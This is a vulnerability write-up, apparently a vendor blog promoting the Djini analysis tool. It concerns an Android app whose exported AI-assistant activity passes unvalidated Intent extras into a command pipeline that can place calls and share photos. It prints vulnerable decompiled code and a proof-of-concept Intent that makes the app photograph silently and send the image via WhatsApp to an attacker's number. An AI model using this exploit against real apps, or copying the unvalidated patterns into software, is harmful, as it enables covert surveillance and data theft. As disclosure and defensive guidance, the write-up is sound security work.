subtitle

Blog

subtitle

Unauthorized Device
Command and Control

How an Exported Activity processed untrusted Intent extras without
validation, allowing malicious application to trigger device actions.

Summary

In this blog post, I wrote a vulnerability in an Android application where an exported AI activity processed untrusted Intent extras without validation. This issue allowed another application on the same device to trigger privileged device actions. An attacker-controlled application was able to invoke up to 52 internal functions, including modifying system settings, controlling connectivity features, initiating calls/messages, capturing photos, performing screen captures, and sending arbitrary images.
 

The issue was caused by improper access control and missing input validation in the exported activity. The activity was intended to handle queries, but it accepted Intent data from any application without verifying the caller or enforcing permission checks. The supplied extras were forwarded directly into the AI processing pipeline and mapped to device control commands handled by a privileged backend component. Because no caller validation, permission enforcement, or input sanitization was implemented, attacker-controlled input was able to reach system-level APIs and execute sensitive operations.

 

TL;DR

To summarize, the chain of attack was as follows:
1. The attacker application was installed and launched on the device.
2. The attacker application sent a crafted Intent with controlled extras to the exported activity.
3. The exported activity in the victim application processed the untrusted input and forwarded it to the command pipeline without validation.
4. The backend device control component interpreted the input and invoked privileged functions.
5. The victim application triggered the camera to capture a photo without user interaction.
6. The victim application sent the captured image via WhatsApp to an attacker-controlled number.

Technical Details

In com.victim.ai.MainActivity.onNewIntent(Intent intent):
 
The activity is exported, meaning any application on the device can send it an Intent. It extracts the following attacker-controlled extras and forwards them to Frag.g1() without any validation:
• start (int): Selected which AI fragment was activated.
• Query (String): Contained the command string injected into the AI pipeline.
• Action (boolean): Signaled the AI to treat the query as an executable command.
• Turns (boolean): Enabled conversational or permissive processing mode, bypassing command restrictions.
• IsAdd (boolean): Controlled how the query was queued or batched for processing.
protected final void onNewIntent(Intent intent) {
    this.d = intent.getIntExtra("start", 0);
    // No validation on any of the following extras
    if (n instanceof Frag) {
        ((Frag) n).g1(intent); // Entire untrusted Intent forwarded
    }
}
In com.victim.ai.fragment.Frag.g1(Intent intent):
 
The method received the full untrusted Intent and mapped its extras directly to internal fields that controlled the AI command execution. These fields were then processed by the NLU pipeline, which interpreted the d (Query) value as a command and dispatched it to the corresponding device control handler.
public final void g1(Intent intent) {
    c = intent.getBooleanExtra("Action", false);   // Triggers command execution mode
    d = intent.getStringExtra("Query");   // Attacker-controlled command string
    e = intent.getBooleanExtra("Turns", false); // Enables permissive processing
    f = intent.getBooleanExtra("IsAdd", false); // Controls query batching
}
In com.victim.ai.Handler.makeCall(String phoneNumber, ResponseBean responseBean):
 
This method is invoked when the AI NLU pipeline parses the Query string and identifies a call command (e.g., “Call +912345678”). It constructs a tel: URI from the attacker-supplied phone number and directly triggers a phone call via the Android TelecomManager or Intent.ACTION_CALL, with no caller verification, no contact validation, and no user confirmation. The entire execution chain is driven by the attacker-supplied Query string.
public final void makeCall(String phoneNumber, ResponseBean responseBean) {
    // phoneNumber is attacker-controlled via Query
    // e.g., Query: "Call +912345678"
    Uri callUri = Uri.parse("tel:" + phoneNumber); // No validation on phoneNumber
    Intent callIntent = new Intent(Intent.ACTION_CALL);
    callIntent.setData(callUri);
    callIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    // Directly initiates a phone call — no user confirmation required
    Utils.e().startActivity(callIntent);
}
In com.victim.ai.Handler.getPhotos(Context context, int count):
 
This method is invoked as part of the photo-sharing flow. It queries the device’s MediaStore.Images.Media content provider to retrieve the photos from the gallery. The count parameter controls how many photos are retrieved. Since this is triggered by the attacker-controlled Query (e.g., “Send photos to +912345678 via WhatsApp”), the attacker can access and retrieve the victim’s photos without any user interaction or consent.
private final List getPhotos(Context context, int count) {
    List photoUris = new ArrayList<>();
    // Queries MediaStore for photos — no user consent check
    Cursor cursor = context.getContentResolver().query(
        MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
        new String[]{MediaStore.Images.Media._ID},
        null,
        null,
        MediaStore.Images.Media.DATE_ADDED + " DESC"
    );
    if (cursor != null) {
        int idColumn = cursor.getColumnIndexOrThrow(MediaStore.Images.Media._ID);
        while (cursor.moveToNext() && photoUris.size() < count) {
            long id = cursor.getLong(idColumn);
            Uri photoUri = ContentUris.withAppendedId(
                MediaStore.Images.Media.EXTERNAL_CONTENT_URI, id
            );
            photoUris.add(photoUri); // Attacker receives all photos
        }
        cursor.close();
    }
    return photoUris; // Returns list of photo URIs — passed to share flow
}

Exploitation

To exploit this issue, a malicious application must be installed on the victim’s device. See Java code below:
 
Intent meow = new Intent(Intent.ACTION_SEND);
meow.setClassName("com.victim.ai", "com.victim.ai.MainActivity");
meow.putExtra("start", 1);
meow.putExtra("Query", "Take Photo and send photos to +63901234567 via WhatsApp");
meow.putExtra("Turns", true);
meow.putExtra("Action", true);
meow.putExtra("IsAdd", true);
meow.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
startActivity(meow);

Recommendation

To prevent this type of vulnerability, MobileHackingLab recommended the following:
• Use Djini early in testing to identify not only exported components and unvalidated input issues but also other flaws.
• Avoid exporting activities unless necessary. Internal-only activities should be marked as exported=false.
• Treat all Intent extras as untrusted. Verify the caller and sanitize data before processing.
• Require explicit user confirmation for all privileged device actions; do not execute silently.

Did Djini help me?

I was able to upload the application easily while doing other things. It supported different binary files, and the analysis finished in just a few minutes, depending on the application size. After the upload, the application was fully analyzed almost right away.
 
The Djini agent quickly found an entry point and showed the exported MainActivity. By running a /start command, I was able to see how intents were handled, which methods controlled the code flow, and which extras were required.
The screenshot showed that Djini identified and mapped a security issue in an Android application. The tool highlighted an exported activity MainActivity and traced how untrusted Intent extras were processed. It demonstrated the vulnerability flow, showing the methods that handled the input (onNewIntent()Frag.g1()) and how internal fields were set without validation.
Djini also generated a ready-to-use exploit PoC, illustrating how an attacker could supply crafted Intent extras to trigger privileged actions, such as a device shutdown. This workflow demonstrated how Djini accelerated vulnerability discovery and reproduction, providing clarity that previously required extensive manual analysis.
When I worked as a Security Consultant and Bug Bounty Hunter, what always took hours or days of reverse engineering was identified in minutes, and the built‑in screenshot feature for dynamic analysis confirmed that the exploit worked while reducing false positives. This process usually took a lot of time.

Want to know more? ​

Djini accelerated the research process by removing much of the reverse‑engineering overhead and highlighting dangerous primitives early. This enabled security teams, pentesters, and researchers to prioritize meaningful impact instead of boilerplate analysis.
Combined with iOS jailbroken and Android rooted devices, along with bundled premium courses and certifications from MobileHackingLab, it provided a complete end‑to‑end mobile security workflow.
For teams that wanted to move faster and go deeper, scheduling a demo made it possible to see the platform in action.
Book a meeting: https://calendly.com/d/cryq-nqv-8gf/book-a-demo
Check out the subscription: https://djini.ai/pricing/
Leave A Comment